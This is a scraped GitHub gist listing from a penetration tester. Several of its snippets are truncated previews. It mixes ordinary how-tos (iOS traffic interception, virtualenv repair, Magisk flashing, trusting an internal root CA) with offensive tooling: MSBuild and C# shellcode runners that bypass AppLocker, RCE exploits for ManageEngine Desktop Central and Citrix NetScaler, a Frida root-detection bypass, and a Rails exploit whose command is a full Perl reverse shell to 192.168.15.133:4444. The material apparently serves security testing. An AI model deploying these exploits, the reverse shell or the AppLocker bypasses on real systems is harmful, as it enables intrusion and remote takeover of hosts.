Skip to content

Instantly share code, notes, and snippets.

Avatar

LongCat pich4ya

View GitHub Profile
@pich4ya
pich4ya / gist:1ac125726e4f79c6832899e6c9b7bde1
Last active Jan 29, 2021
How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
View gist:1ac125726e4f79c6832899e6c9b7bde1
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# วิธี mitm ดัก Web API ของ iOS App ผ่าน MacOS -> Burp Suite ที่เป็น unaware proxy
# (เช่น Xamarin, Flutter ที่ไม่วิ่งผ่าน System Proxy ไม่ใช้ default Cert Store ใน iPhone)
# ถ้าเป็นแอปปกติ ที่ใช้ system proxy อยู่แล้วไม่ต้องทำท่านี้ก็ได้ ตั้ง proxy ปกติไปได้เลย
1. เสียบ iPhone (ที่ jailbreak แล้ว) กับ MBP ผ่าน USB แล้วใช้ iproxy ตั้งให้ local port 8080 บน iPhone วิ่งเข้า local port 8080 บน MBP ด้วย ssh tunnel
$ brew install usbmuxd
$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 root@127.0.0.1 -N -f
@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
View fix_virtualenv
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
@pich4ya
pich4ya / magisk_pixel3a.txt
Last active May 16, 2020
Clean Flash Magisk on Pixel 3a (Android 9)
View magisk_pixel3a.txt
@author LongCat (Pichaya Morimoto)
1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"
Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)
Connect Pixel 3a to MBP > allow access in the device's prompt.
@pich4ya
pich4ya / shellcode.xml
Created May 1, 2020 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
View shellcode.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@pich4ya
pich4ya / Shellcode.cs
Created May 1, 2020 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View src-2020-0011.py
#!/usr/local/bin/python3
"""
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability
Download: https://www.manageengine.com/products/desktop-central/download-free.html
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189
@pich4ya
pich4ya / readme_render_exploit.py
Last active Feb 8, 2020
Fix broken rails_dynamic_render_code_exec's exploit against Metasploitable 3
View readme_render_exploit.py
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests
# 1. tmp upload
host = "172.28.128.3"
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
@pich4ya
pich4ya / netscaler_exploit.py
Created Jan 19, 2020 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
View netscaler_exploit.py
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
@pich4ya
pich4ya / secureRootCert1.java
Last active Nov 29, 2019
วิธีการไม่ trust all HTTPS cert เวลาต่อ internal API ที่ API server ใช้ cert ที่ issue มาจาก internal root CA
View secureRootCert1.java
/*
ต้อง
- แน่ใจว่ามีไฟล์ root certificate แล้ว
- ตั้ง $JAVA_HOME ให้ถูกที่ และแน่ใจว่ามีโฟล์ $JAVA_HOME/jre/lib/security/cacerts
- รหัสผ่านของ Java keystore เป็นคำว่า changeit โดยค่า default
วิธีการ
1. ต้องไปดาวน์โหลดหรือขอ root certificate ที่จะใช้มาก่อน
Root certificates contain public information and CAs always make them available for anyone.
$ wget https://sth.sh/demo/STH_Root_CA.pem -O ca.pem
@pich4ya
pich4ya / root_bypass.js
Created Aug 5, 2019
Bypass Android Root Detection / Bypass RootBeer - August 2019
View root_bypass.js
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",